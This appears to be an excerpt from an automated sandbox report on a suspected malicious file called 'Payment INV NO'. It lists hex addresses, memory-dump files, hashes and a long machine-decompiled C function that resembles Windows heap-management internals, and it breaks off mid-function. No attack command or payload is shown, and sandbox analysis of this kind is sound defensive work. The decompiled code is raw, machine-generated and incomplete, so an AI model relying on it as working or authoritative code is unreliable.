                                                          0x017efc67
                                                          0x017efc69
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0179300f
                                                          0x0179300f
                                                          0x01793018
                                                          0x00000000
                                                          0x0179301e
                                                          0x01793024
                                                          0x01793025
                                                          0x0179302a
                                                          0x01793030
                                                          0x01793032
                                                          0x017efc74
                                                          0x017efc76
                                                          0x017efc7a
                                                          0x017efc81
                                                          0x017efc8f
                                                          0x017efc93
                                                          0x017efc98
                                                          0x017efc9d
                                                          0x017efc9f
                                                          0x017efcb1
                                                          0x017efca1
                                                          0x017efcaa
                                                          0x017efcaa
                                                          0x017efcb6
                                                          0x017efcb9
                                                          0x017efcbf
                                                          0x017efcc5
                                                          0x017efcc5
                                                          0x017efcca
                                                          0x017efcca
                                                          0x01793041
                                                          0x01793100
                                                          0x01793047
                                                          0x01793047
                                                          0x01793047
                                                          0x0179304b
                                                          0x0179310b
                                                          0x0179310f
                                                          0x0179311c
                                                          0x01793121
                                                          0x01793121
                                                          0x01793051
                                                          0x01793059
                                                          0x017efcde
                                                          0x017efce3
                                                          0x017efce5
                                                          0x017efcea
                                                          0x017efcea
                                                          0x01793063
                                                          0x01793075
                                                          0x01793075
                                                          0x00000000
                                                          0x0179307b
                                                          0x01793081
                                                          0x01793086
                                                          0x0179308d
                                                          0x00000000
                                                          0x0179308f
                                                          0x0179308f
                                                          0x01793094
                                                          0x017930a0
                                                          0x017efcfa
                                                          0x017930a6
                                                          0x017930a6
                                                          0x017930a6
                                                          0x017930ab
                                                          0x017efd01
                                                          0x017efd07
                                                          0x017efd0e
                                                          0x017efd14
                                                          0x017efd19
                                                          0x017efd1b
                                                          0x017efd26
                                                          0x017efd26
                                                          0x017efd26
                                                          0x017efd2f
                                                          0x017efd38
                                                          0x017efd39
                                                          0x017efd3b
                                                          0x017efd43
                                                          0x017efd44
                                                          0x017efd48
                                                          0x017efd48
                                                          0x017efd0e
                                                          0x017930b1
                                                          0x017930b6
                                                          0x017930c2
                                                          0x017efd5b
                                                          0x017930c8
                                                          0x017930c8
                                                          0x017930c8
                                                          0x017930cd
                                                          0x017efd62
                                                          0x017efd67
                                                          0x017efd69
                                                          0x017efd74
                                                          0x017efd74
                                                          0x017efd74
                                                          0x017efd7d
                                                          0x017efd86
                                                          0x017efd87
                                                          0x017efd89
                                                          0x017efd91
                                                          0x017efd92
                                                          0x017efd96
                                                          0x017efd96
                                                          0x017930da
                                                          0x017efda9
                                                          0x017930e0
                                                          0x017930e0
                                                          0x017930e0
                                                          0x017930e8
                                                          0x01793131
                                                          0x01793131
                                                          0x00000000
                                                          0x017930e8
                                                          0x0179308d
                                                          0x01793018

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID: DebugPrintTimes
                                                          • String ID: HEAP: $HEAP[%wZ]:
                                                          • API String ID: 3446177414-3616360210
                                                          • Opcode ID: 9def4a6825e55be0c5eb321dc2e84258f29c2a84a15c9d385cf4896865bf4565
                                                          • Instruction ID: 5d26a4eaeef97654741fdff218bb091cf9803654563081fdf330fc78a2fd332a
                                                          • Opcode Fuzzy Hash: 9def4a6825e55be0c5eb321dc2e84258f29c2a84a15c9d385cf4896865bf4565
                                                          • Instruction Fuzzy Hash: A4913571304A01DBDB26EB3CD898B3AFBE6FF88740F044559E9418B695DB34D948CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B7D70 Relevance: 5.4, Strings: 3, Instructions: 1672COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E017B7D70(signed char __ecx, signed int __edx, signed int _a4, intOrPtr _a8) {
				signed char _v8;
				signed int _v12;
				char _v20;
				char _v29;
				signed int _v36;
				signed short _v40;
				signed int _v44;
				char _v45;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int* _v64;
				signed short _v68;
				char _v72;
				short _v76;
				signed int _v80;
				signed int _v84;
				char _v85;
				char _v86;
				signed int* _v92;
				signed char _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v120;
				signed short _v124;
				signed short _v128;
				signed int _v132;
				signed int _v136;
				signed char _v137;
				signed short _v140;
				signed short _v142;
				signed int _v148;
				signed char _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed char _v172;
				unsigned int _v176;
				signed char _v180;
				signed char _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v196;
				unsigned int* _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed char _v216;
				intOrPtr _v220;
				signed int _v224;
				intOrPtr _v228;
				signed int _v232;
				signed int _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				intOrPtr _v260;
				unsigned int _v268;
				unsigned int _v276;
				unsigned int _v284;
				unsigned int _v292;
				unsigned int _v300;
				unsigned int _v308;
				unsigned int _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t712;
				signed char _t718;
				signed int* _t720;
				signed char* _t721;
				signed char _t723;
				void* _t727;
				signed int _t730;
				signed int _t732;
				signed int* _t735;
				signed int _t739;
				signed char* _t742;
				intOrPtr _t743;
				signed int _t744;
				signed char* _t747;
				signed char* _t749;
				signed int _t759;
				signed char* _t760;
				signed int _t772;
				signed int _t774;
				intOrPtr* _t796;
				signed int* _t797;
				intOrPtr _t804;
				signed int* _t809;
				signed int _t810;
				intOrPtr _t813;
				signed int* _t820;
				signed int _t821;
				intOrPtr _t825;
				signed short _t826;
				signed int _t832;
				signed int _t833;
				intOrPtr _t835;
				signed int* _t836;
				signed int _t837;
				signed int* _t840;
				signed int _t841;
				signed int _t844;
				signed int _t846;
				signed int* _t850;
				signed int _t851;
				signed short _t853;
				signed short _t859;
				signed short _t865;
				intOrPtr* _t879;
				intOrPtr* _t881;
				intOrPtr _t882;
				signed int* _t885;
				signed int _t886;
				signed int _t888;
				signed int* _t890;
				intOrPtr _t899;
				signed int _t905;
				signed int _t907;
				intOrPtr* _t910;
				signed int _t912;
				signed int _t913;
				signed char* _t914;
				signed char _t915;
				signed int* _t919;
				signed int _t920;
				signed short _t925;
				signed int* _t932;
				signed int _t934;
				signed int* _t936;
				intOrPtr _t942;
				signed int _t946;
				signed int _t952;
				signed int _t956;
				intOrPtr* _t964;
				intOrPtr _t965;
				signed int _t968;
				signed int _t969;
				signed int* _t972;
				signed short _t975;
				intOrPtr _t981;
				intOrPtr _t988;
				signed int _t989;
				signed int _t990;
				intOrPtr* _t992;
				signed int _t994;
				signed short _t995;
				signed int _t996;
				intOrPtr _t998;
				signed int* _t1000;
				signed int _t1001;
				signed short _t1004;
				signed int _t1013;
				short _t1014;
				signed int _t1019;
				signed int _t1028;
				void* _t1046;
				signed int _t1048;
				signed int _t1049;
				signed short _t1051;
				signed int _t1053;
				signed short _t1054;
				signed int _t1055;
				unsigned int _t1060;
				signed int _t1063;
				unsigned int _t1068;
				intOrPtr _t1073;
				signed char _t1074;
				signed char _t1076;
				signed int _t1079;
				signed short _t1080;
				signed int* _t1082;
				signed int* _t1083;
				signed char _t1089;
				signed short _t1091;
				intOrPtr _t1093;
				signed short _t1094;
				intOrPtr _t1096;
				signed int _t1099;
				signed int _t1102;
				signed int _t1103;
				signed int _t1107;
				signed short _t1110;
				signed int _t1112;
				signed char _t1116;
				signed char _t1121;
				signed char _t1126;
				unsigned int _t1133;
				intOrPtr* _t1134;
				intOrPtr _t1135;
				intOrPtr* _t1137;
				signed int* _t1139;
				intOrPtr* _t1140;
				signed char _t1142;
				signed int _t1144;
				intOrPtr _t1146;
				signed char* _t1150;
				signed char _t1157;
				intOrPtr* _t1160;
				signed char _t1161;
				intOrPtr _t1162;
				signed int _t1167;
				signed char _t1173;
				signed char _t1178;
				signed int _t1180;
				signed char _t1181;
				intOrPtr _t1182;
				signed int _t1184;
				signed int* _t1185;
				signed char _t1187;
				signed int _t1189;
				signed int _t1190;
				intOrPtr _t1191;
				signed int _t1195;
				signed char _t1201;
				signed char _t1206;
				signed char _t1208;
				intOrPtr _t1211;
				signed short* _t1215;
				signed char _t1217;
				signed int _t1218;
				signed int _t1219;
				signed char _t1226;
				void* _t1227;
				signed int _t1234;
				intOrPtr* _t1236;
				signed int _t1239;
				signed int _t1240;
				unsigned int _t1243;
				signed int _t1246;
				signed int _t1247;
				unsigned int* _t1249;
				signed int _t1250;
				signed int _t1251;
				unsigned int _t1253;
				unsigned int _t1257;
				unsigned int _t1261;
				signed int* _t1266;
				intOrPtr _t1267;
				signed int* _t1269;
				unsigned int _t1273;
				signed int _t1278;
				unsigned int _t1280;
				unsigned int _t1287;
				signed int _t1290;
				unsigned int _t1294;
				signed char* _t1297;
				signed int _t1301;
				signed char _t1302;
				signed short _t1307;
				signed int _t1309;
				unsigned int _t1312;
				unsigned int _t1316;
				signed int _t1319;
				intOrPtr _t1322;
				intOrPtr _t1323;
				signed int _t1324;
				signed int _t1334;
				signed char _t1335;
				signed int _t1339;
				void* _t1340;
				signed int _t1341;
				signed int _t1342;
				signed char _t1343;
				signed int _t1345;
				void* _t1352;
				signed int _t1354;
				signed int _t1361;
				signed int _t1362;
				signed int* _t1363;
				signed int _t1367;
				signed int _t1368;
				signed int _t1369;
				intOrPtr _t1370;
				signed int _t1371;
				void* _t1372;
				void* _t1373;
				void* _t1376;
				void* _t1377;
				signed int _t1382;

				_t1064 = __ecx;
				_push(0xfffffffe);
				_push(0x186fcc8);
				_push(0x17e17f0);
				_push( *[fs:0x0]);
				_t1373 = _t1372 - 0x128;
				_push(_t1046);
				_t712 =  *0x188d360;
				_v12 = _v12 ^ _t712;
				_push(_t712 ^ _t1371);
				 *[fs:0x0] =  &_v20;
				_t1329 = __ecx;
				_v216 = __ecx;
				_v29 = 1;
				_v45 = 0;
				_v152 = 0;
				_v180 = 1;
				_v108 = 0;
				_v132 = 0;
				_v172 = 0;
				_v76 = 0;
				_t716 = _a4;
				if(__ecx == _a4) {
					_push(__ecx);
					L0185A80D(__ecx, _t716, 0, 0);
					_t718 = 0;
					L118:
					 *[fs:0x0] = _v20;
					return _t718;
				}
				_t1226 = __edx |  *(__ecx + 0x44);
				_v84 = _t1226;
				if((_t1226 & 0x7d010f60) != 0) {
					_v29 = 0;
					_t1333 = 4;
					__eflags = _t1226 & 0x61000000;
					if(__eflags == 0) {
						goto L3;
					}
					__eflags = _t1226 & 0x10000000;
					if(__eflags != 0) {
						goto L3;
					} else {
						_push(_a8);
						_t718 = L018535B3(_t1046, __ecx, _t1226, __ecx, 4, __eflags);
						goto L118;
					}
				} else {
					_t1333 = 3;
					L3:
					_t720 =  *( *[fs:0x30] + 0x50);
					if(_t720 != 0) {
						__eflags =  *_t720;
						if(__eflags == 0) {
							goto L4;
						}
						_t721 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L5:
						if( *_t721 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags == 0) {
								goto L6;
							}
							_t1048 = _a4;
							_t1064 =  *(_t1329 + 0x4c) >> 0x00000011 &  *(_t1329 + 0x52) & 0x000000ff ^  *(_t1048 + 2) & 0x000000ff;
							__eflags = _t1064 & 0x00000008;
							if(__eflags == 0) {
								_t1064 = _t1329;
								L01851608(_t1064, _a8, _t1333);
								_t1226 = _v84;
							}
							L7:
							_v8 = 0;
							_t1382 = _t1226 & 0x00000001;
							if(_t1382 != 0) {
								__eflags =  *(_t1329 + 0x4c);
								if(__eflags != 0) {
									 *_t1048 =  *_t1048 ^  *(_t1329 + 0x50);
									__eflags =  *(_t1048 + 3) - ( *(_t1048 + 2) ^  *(_t1048 + 1) ^  *_t1048);
									if(__eflags != 0) {
										_push(_t1064);
										L0184FA2B(_t1048, _t1329, _t1048, _t1329, _t1333, __eflags);
									}
								}
								L19:
								_t47 = _t1048 + 2; // 0x3
								_t1334 = _t47;
								_t723 =  *_t1334;
								if((_t723 & 0x00000008) != 0) {
									 *_t1334 = _t723 & 0x000000f7;
								}
								if( *((char*)(_t1048 + 7)) == 4) {
									_t1049 = _t1048 + 0xffffffe8;
									_v108 = _t1049;
									_t1068 =  *(_t1049 + 0x10);
									_v176 = _t1068;
									_v132 = _t1049 & 0xffff0000;
									 *((intOrPtr*)(_t1329 + 0x1f0)) =  *((intOrPtr*)(_t1329 + 0x1f0)) - _t1068;
									_t727 =  *_t1049;
									_t1069 =  *(_t1049 + 4);
									_t1227 =  *_t1069;
									_t1335 =  *(_t727 + 4);
									__eflags = _t1227 - _t1335;
									if(_t1227 != _t1335) {
										L348:
										_push(_t1069);
										_t1069 = 0xd;
										L0185A80D(0, _t1049, _t1335, _t1227);
										L236:
										__eflags = _v29;
										if(_v29 == 0) {
											_t730 =  *( *[fs:0x30] + 0x68);
											_v256 = _t730;
											__eflags = _t730 & 0x00000800;
											if((_t730 & 0x00000800) != 0) {
												_t1069 = _t1329;
												L0183E9F0(_t1329,  *((intOrPtr*)(_v108 + 0xa)),  *(_t1049 + 0x10) >> 3, 0, 3);
											}
										}
										_a4 = 0;
										__eflags = _v45;
										if(_v45 != 0) {
											E017AEB70(_t1069,  *(_t1329 + 0xc8));
											_v45 = 0;
										}
										_t1050 =  *(_v108 + 0x14);
										_v172 =  *(_v108 + 0x14);
										_t732 = E017B7D50();
										__eflags = _t732;
										if(_t732 != 0) {
											_t735 =  &(( *( *[fs:0x30] + 0x50))[0x8b]);
											_t1050 = _v172;
										} else {
											_t735 = 0x7ffe0388;
										}
										__eflags =  *_t735;
										if( *_t735 != 0) {
											L0184FE3F(_t1050, _t1329, _v132, _t1050);
										}
										_v56 = 0;
										_v260 = E017C174B( &_v132,  &_v56, 0x8000);
										_t739 = E017B7D50();
										__eflags = _t739;
										if(_t739 != 0) {
											_t742 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										} else {
											_t742 = 0x7ffe0380;
										}
										__eflags =  *_t742;
										if( *_t742 != 0) {
											_t743 =  *[fs:0x30];
											__eflags =  *(_t743 + 0x240) & 0x00000001;
											if(( *(_t743 + 0x240) & 0x00000001) != 0) {
												_t759 = E017B7D50();
												__eflags = _t759;
												if(_t759 == 0) {
													_t760 = 0x7ffe0380;
												} else {
													_t760 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												__eflags =  *(_t1329 + 0x74) << 3;
												L01851411(_t1050, _t1329, _v108,  *(_t1329 + 0x74) << 3, _v176,  *(_t1329 + 0x74) << 3, 0, 0,  *_t760 & 0x000000ff);
											}
											_t1339 = _a4;
										}
										_t744 = E017B7D50();
										__eflags = _t744;
										if(_t744 != 0) {
											_t747 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											_t1339 = _a4;
										} else {
											_t747 = 0x7ffe038a;
										}
										__eflags =  *_t747;
										if( *_t747 != 0) {
											__eflags = E017B7D50();
											if(__eflags == 0) {
												_t749 = 0x7ffe038a;
											} else {
												_t749 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												_t1339 = _a4;
											}
											L01851411(_t1050, _t1329, _v108, __eflags, _v176,  *(_t1329 + 0x74) << 3, 0, 0,  *_t749 & 0x000000ff);
										}
										_v212 = _v56 >> 3;
										goto L117;
									}
									__eflags = _t1227 - _t1049;
									if(_t1227 != _t1049) {
										goto L348;
									}
									 *_t1069 = _t727;
									 *(_t727 + 4) = _t1069;
									goto L236;
								} else {
									_t772 =  *_t1048 & 0x0000ffff;
									if(_t772 <  *((intOrPtr*)(_t1329 + 0xe0))) {
										_t1048 = _a4;
										if(( *((_t772 >> 3) + _t1329 + 0xe2) & 0x00000001 << (_t772 & 0x00000007)) == 0) {
											_t1215 =  *((intOrPtr*)(_t1329 + 0xdc)) + ( *_t1048 & 0x0000ffff) * 2;
											_t1019 =  *_t1215 & 0x0000ffff;
											if(_t1019 > 1) {
												 *_t1215 = _t1019 - 1;
											}
										}
									}
									_t1073 = _v29;
									if(_t1073 == 0) {
										_t774 =  *( *[fs:0x30] + 0x68);
										_v224 = _t774;
										_t1048 = _a4;
										__eflags = _t774 & 0x00000800;
										if(__eflags != 0) {
											_push(2);
											_push(0);
											__eflags =  *_t1334 & 0x00000002;
											if(( *_t1334 & 0x00000002) == 0) {
												_t1208 =  *(_t1048 + 3);
												_v137 = _t1208;
												_t1013 =  *_t1048 & 0x0000ffff;
												_t1319 = _t1208 & 0x000000ff;
											} else {
												_t1013 =  *_t1048 & 0x0000ffff;
												_t553 = _t1048 - 8; // -7
												_t1211 = _t553 + _t1013 * 8;
												_v228 = _t1211;
												_t1319 =  *((intOrPtr*)(_t1211 + 2));
											}
											_push(_t1013);
											_t1014 = L0183E9F0(_t1329, _t1319);
											_t1073 = _v29;
											_v76 = _t1014;
										}
									}
									_t1234 =  *_t1048 & 0x0000ffff;
									_v56 = _t1234;
									_v212 = _t1234;
									if(( *(_t1329 + 0x40) & 0x00000080) != 0) {
										L60:
										if(_t1234 >=  *((intOrPtr*)(_t1329 + 0x6c))) {
											__eflags =  *(_t1329 + 0x74) + _t1234 -  *((intOrPtr*)(_t1329 + 0x70));
											if( *(_t1329 + 0x74) + _t1234 <  *((intOrPtr*)(_t1329 + 0x70))) {
												goto L61;
											}
											E017BA309(_t1329, _t1048, _t1234, 0);
											L116:
											_t1339 = 0;
											__eflags = 0;
											_a4 = 0;
											L117:
											_v8 = 0xfffffffe;
											E017B8C4A(_t1329, _t1339);
											_t718 = _v180;
											goto L118;
										}
										L61:
										if( *(_t1329 + 0x74) + _t1234 >  *((intOrPtr*)(_t1329 + 0x70))) {
											__eflags = _t1234 - 0x200;
											if(_t1234 < 0x200) {
												goto L62;
											}
											__eflags =  *(_t1329 + 0x54) -  *(_t1048 + 4);
											if( *(_t1329 + 0x54) !=  *(_t1048 + 4)) {
												goto L62;
											}
											E017BA309(_t1329, _t1048, _t1234, 0);
											_v76 = 0;
											goto L116;
										}
										L62:
										if(_t1234 > 0xfe00) {
											_t1235 = _t1048;
											_t1074 = _t1329;
											E017BA830(_t1074, _t1048, _t1234);
											L115:
											__eflags = _v76;
											if(_v76 != 0) {
												__eflags =  *(_t1329 + 0x4c);
												if( *(_t1329 + 0x4c) != 0) {
													 *_t1048 =  *_t1048 ^  *(_t1329 + 0x50);
													__eflags =  *(_t1048 + 3) - ( *(_t1048 + 2) ^  *(_t1048 + 1) ^  *_t1048);
													if(__eflags != 0) {
														_push(_t1074);
														_t1235 = _t1048;
														L0184FA2B(_t1048, _t1329, _t1048, _t1329, _t1334, __eflags);
													}
												}
												_t1076 =  *(_t1048 + 2) | 0x00000002;
												 *(_t1048 + 2) = _t1076;
												_t1340 = _t1048 + ( *_t1048 & 0x0000ffff) * 8;
												__eflags =  *(_t1329 + 0x4c);
												if( *(_t1329 + 0x4c) != 0) {
													 *(_t1048 + 3) =  *(_t1048 + 1) ^ _t1076 ^  *_t1048;
													 *_t1048 =  *_t1048 ^  *(_t1329 + 0x50);
													__eflags =  *_t1048;
												}
												 *((short*)(_t1340 - 4)) = _v76;
												 *((short*)(_t1340 - 2)) = 0;
												__eflags =  *(_t1329 + 0x40) & 0x08000000;
												if(( *(_t1329 + 0x40) & 0x08000000) != 0) {
													 *((short*)(_t1340 - 2)) = E017C16C7(1, _t1235);
												}
											}
											goto L116;
										}
										_t1341 = _t1234 & 0x0000ffff;
										if(_t1073 == 0) {
											 *(_t1048 + 2) =  *(_t1048 + 2) & 0x000000f0;
											 *((char*)(_t1048 + 7)) = 0;
											__eflags =  *(_t1329 + 0x40) & 0x00000040;
											if(( *(_t1329 + 0x40) & 0x00000040) != 0) {
												_t650 = _t1048 + 0x10; // 0x11
												E017ED5E0(_t650, _t1341 * 8 - 0x10, 0xfeeefeee);
												 *(_t1048 + 2) =  *(_t1048 + 2) | 0x00000004;
											}
											_t796 = _t1329 + 0xc0;
											__eflags =  *(_t1329 + 0xb4);
											if( *(_t1329 + 0xb4) == 0) {
												_t1236 =  *_t796;
											} else {
												_t1236 = E017BE12C(_t1329, _t1341);
												_t796 = _t1329 + 0xc0;
											}
											while(1) {
												__eflags = _t796 - _t1236;
												if(_t796 == _t1236) {
													break;
												}
												__eflags =  *(_t1329 + 0x4c);
												if( *(_t1329 + 0x4c) == 0) {
													_t1080 =  *(_t1236 - 8);
													_v142 = _t1080;
												} else {
													_t1080 =  *(_t1236 - 8);
													_v124 = _t1080;
													__eflags =  *(_t1329 + 0x4c) & _t1080;
													if(( *(_t1329 + 0x4c) & _t1080) != 0) {
														_t1080 = _t1080 ^  *(_t1329 + 0x50);
														__eflags = _t1080;
														_v124 = _t1080;
													}
													_v142 = _t1080;
													_t1048 = _a4;
												}
												__eflags = _t1341 - (_t1080 & 0x0000ffff);
												if(_t1341 > (_t1080 & 0x0000ffff)) {
													_t1236 =  *_t1236;
													_t796 = _t1329 + 0xc0;
													continue;
												} else {
													break;
												}
											}
											_t496 = _t1048 + 8; // 0x9
											_t1334 = _t496;
											_t797 =  *(_t1236 + 4);
											_t1074 =  *_t797;
											__eflags = _t1074 - _t1236;
											if(_t1074 != _t1236) {
												_push(_t1074);
												_t1074 = 0xd;
												L0185A80D(0, _t1236, 0, 0xd);
											} else {
												 *_t1334 = _t1236;
												 *(_t1334 + 4) = _t797;
												 *_t797 = _t1334;
												 *(_t1236 + 4) = _t1334;
											}
											 *(_t1329 + 0x74) =  *(_t1329 + 0x74) + ( *_t1048 & 0x0000ffff);
											_t1235 =  *(_t1329 + 0xb4);
											__eflags = _t1235;
											if(_t1235 == 0) {
												L113:
												__eflags =  *(_t1329 + 0x4c);
												if( *(_t1329 + 0x4c) != 0) {
													 *(_t1048 + 3) =  *(_t1048 + 2) ^  *(_t1048 + 1) ^  *_t1048;
													 *_t1048 =  *_t1048 ^  *(_t1329 + 0x50);
													__eflags =  *_t1048;
												}
												goto L115;
											} else {
												_t1079 =  *_t1048 & 0x0000ffff;
												while(1) {
													_t804 =  *((intOrPtr*)(_t1235 + 4));
													__eflags = _t1079 - _t804;
													if(_t1079 < _t804) {
														break;
													}
													_t1342 =  *_t1235;
													_v136 = _t1342;
													__eflags = _t1342;
													_t658 = _t1048 + 8; // 0x9
													_t1334 = _t658;
													if(_t1342 != 0) {
														_t1235 = _v136;
														continue;
													}
													_t1079 = _t804 - 1;
													break;
												}
												_v136 = _t1079;
												_t1074 = _t1329;
												E017BE4A0(_t1074, _t1235, 1, _t1334, _t1079,  *_t1048 & 0x0000ffff);
												goto L113;
											}
										}
										_v84 = _t1341;
										 *(_t1048 + 2) = 0;
										 *((char*)(_t1048 + 7)) = 0;
										_t809 = _t1329 + 0xc0;
										_t1082 =  *(_t1329 + 0xb4);
										_v36 = _t1082;
										if(_t1082 == 0) {
											_t1334 =  *_t809;
											L94:
											_t1239 = _v84;
											while(1) {
												__eflags = _t809 - _t1334;
												if(_t809 == _t1334) {
													break;
												}
												__eflags =  *(_t1329 + 0x4c);
												if( *(_t1329 + 0x4c) == 0) {
													_t640 = _t1334 - 8; // 0x17ff917
													_t1091 =  *_t640;
													_v140 = _t1091;
												} else {
													_t244 = _t1334 - 8; // 0x17ff917
													_t1091 =  *_t244;
													_v68 = _t1091;
													__eflags =  *(_t1329 + 0x4c) & _t1091;
													if(( *(_t1329 + 0x4c) & _t1091) != 0) {
														_t1091 = _t1091 ^  *(_t1329 + 0x50);
														__eflags = _t1091;
														_v68 = _t1091;
													}
													_v140 = _t1091;
													_t1048 = _a4;
												}
												__eflags = _t1239 - (_t1091 & 0x0000ffff);
												if(_t1239 > (_t1091 & 0x0000ffff)) {
													_t1334 =  *_t1334;
													_t809 = _t1329 + 0xc0;
													continue;
												} else {
													break;
												}
											}
											_t253 = _t1048 + 8; // 0x9
											_t810 = _t253;
											_v96 = _t810;
											_t255 = _t1334 + 4; // 0x0
											_t1083 =  *_t255;
											_t1235 =  *_t1083;
											__eflags = _t1235 - _t1334;
											if(_t1235 != _t1334) {
												_push(_t1083);
												_t1235 = 0;
												L0185A80D(0, _t1334, 0, 0);
											} else {
												 *_t810 = _t1334;
												 *(_t810 + 4) = _t1083;
												 *_t1083 = _t810;
												 *(_t1334 + 4) = _t810;
											}
											 *(_t1329 + 0x74) =  *(_t1329 + 0x74) + ( *_t1048 & 0x0000ffff);
											_t1074 =  *(_t1329 + 0xb4);
											_v44 = _t1074;
											__eflags = _t1074;
											if(_t1074 == 0) {
												goto L113;
											} else {
												_t1240 =  *_t1048 & 0x0000ffff;
												while(1) {
													_t262 = _t1074 + 4; // 0x0
													_t813 =  *_t262;
													__eflags = _t1240 - _t813;
													if(_t1240 < _t813) {
														break;
													}
													_t1343 =  *_t1074;
													__eflags = _t1343;
													if(_t1343 == 0) {
														_t1240 = _t813 - 1;
														break;
													}
													_t1074 = _t1343;
													_v44 = _t1074;
												}
												_v148 = _t1240;
												_v120 =  *_t1048 & 0x0000ffff;
												_t265 = _t1074 + 0x14; // 0x0
												_t1345 = _t1240 -  *_t265;
												_v60 = _t1345;
												__eflags =  *(_t1074 + 8);
												if( *(_t1074 + 8) != 0) {
													_v80 = _t1345 + _t1345;
												} else {
													_v80 = _t1345;
												}
												 *((intOrPtr*)(_t1074 + 0xc)) =  *((intOrPtr*)(_t1074 + 0xc)) + 1;
												_t271 = _t1074 + 0x20; // 0xfffffffe
												_v40 =  *( *_t271 + _v80 * 4);
												_t276 = _t1074 + 4; // 0x0
												__eflags = _t1240 -  *_t276 - 1;
												_t1334 = _v60;
												if(_t1240 ==  *_t276 - 1) {
													 *((intOrPtr*)(_t1074 + 0x10)) =  *((intOrPtr*)(_t1074 + 0x10)) + 1;
												}
												_t1235 = _v40;
												__eflags = _t1235;
												if(_t1235 != 0) {
													_t406 = _t1235 - 8; // 0x186fcc0
													_t820 = _t406;
													_v64 = _t820;
													_t821 =  *_t820;
													_v316 = _t821;
													_t1051 = _t821 & 0x0000ffff;
													__eflags =  *(_t1329 + 0x4c);
													if( *(_t1329 + 0x4c) != 0) {
														_t1243 =  *(_t1329 + 0x50) ^ _t821;
														_v316 = _t1243;
														_t826 = _t1243 & 0x0000ffff;
														_v148 = _t826;
														_t1051 = _t826 & 0x0000ffff;
														_t1089 = _t1243 >> 0x00000010 ^ _t1243 >> 0x00000008 ^ _t1243;
														__eflags = _t1243 >> 0x18 - _t1089;
														if(_t1243 >> 0x18 != _t1089) {
															_push(_t1089);
															L0185A80D(_t1329, _v64, 0, 0);
